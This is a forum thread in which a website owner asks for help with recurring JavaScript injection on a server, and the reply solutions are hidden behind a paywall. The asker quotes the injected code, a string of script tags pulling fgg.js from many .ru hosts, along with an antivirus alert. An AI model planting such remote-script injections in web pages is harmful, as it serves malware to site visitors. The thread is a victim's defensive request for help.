adammatthews1
asked on
Malware on my webserver:
I had a malware problem on www.avalonme.com last week. My webmaster deleted all files and uploaded backup files. We also changed the password. Java script (see below) is still being injected into the files causing errors when I view pages in my Explorer browser and Google is showing some of the pages as "attack" sites.
My webmaster is deleting and reloading backup. This time he will make the public folder non-writeable. I use PC Security Shield anti-virus software and one of the events it shows reads: "7/17/2008 9:34:05 AM Malicious HTTP object <http://www.gbradw.com/fgg.js>: detected virus 'Net-Worm.JS.Aspxor.a'." The code being injected can be viewed in the attached "Code Snippet" Any other suggestions to prevent whatever is injecting the javascript?
My webmaster is deleting and reloading backup. This time he will make the public folder non-writeable. I use PC Security Shield anti-virus software and one of the events it shows reads: "7/17/2008 9:34:05 AM Malicious HTTP object <http://www.gbradw.com/fgg.js>: detected virus 'Net-Worm.JS.Aspxor.a'." The code being injected can be viewed in the attached "Code Snippet" Any other suggestions to prevent whatever is injecting the javascript?
<script src=http://www.lodse.ru/fgg.js></script><script
src=http://www.h23f.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.4cnw.ru/fgg.js></script><script
src=http://www.adwr.ru/fgg.js></script><script
src=http://www.gb53.ru/fgg.js></script><script
src=http://www.h23f.ru/fgg.js></script><script
src=http://www.vcre.ru/fgg.js></script><script
src=http://www.rrcs.ru/fgg.js></script><script
src=http://www.5kc3.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.sslwer.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.adwr.ru/fgg.js></script><script
src=http://www.keje.ru/fgg.js></script><script
src=http://www.lkc2.ru/fgg.js></script><script
src=http://www.bnrc.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.lkc2.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.jex5.ru/fgg.js></script>
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Mohammed,
log file is attached. When I ran "event viewer", it popped up a program with menu choices. Is there something else I need to do? I'll try to go log from webmaster as well since both our computers had the password on it.
Jahboite,
Thank you for your advice, - I'll pass to my webmaster.
hijackthis.log
log file is attached. When I ran "event viewer", it popped up a program with menu choices. Is there something else I need to do? I'll try to go log from webmaster as well since both our computers had the password on it.
Jahboite,
Thank you for your advice, - I'll pass to my webmaster.
hijackthis.log
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Hi everyone,
Thanks to everyone for their input. This has been a very frustrating and confusing experience. My webmaster deleted files again and re-loaded backup. This time he write protected the files and that seems to have solved the problem. We were never able to figure out where the virus originated.
moh10ly: I attached the Hijack file but never heard back from you.??
I will treat this as "accept multiple answers" and assign points as appropriate after I give moh10ly a chance to respond.
Thanks again.
Thanks to everyone for their input. This has been a very frustrating and confusing experience. My webmaster deleted files again and re-loaded backup. This time he write protected the files and that seems to have solved the problem. We were never able to figure out where the virus originated.
moh10ly: I attached the Hijack file but never heard back from you.??
I will treat this as "accept multiple answers" and assign points as appropriate after I give moh10ly a chance to respond.
Thanks again.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Thank you all. I guess the origin of the Malware will never be determined. If someone invents a program to enable serching host server files and cleaning viruses, they'll deliver a major setback to these sociopaths who write malware..
ASKER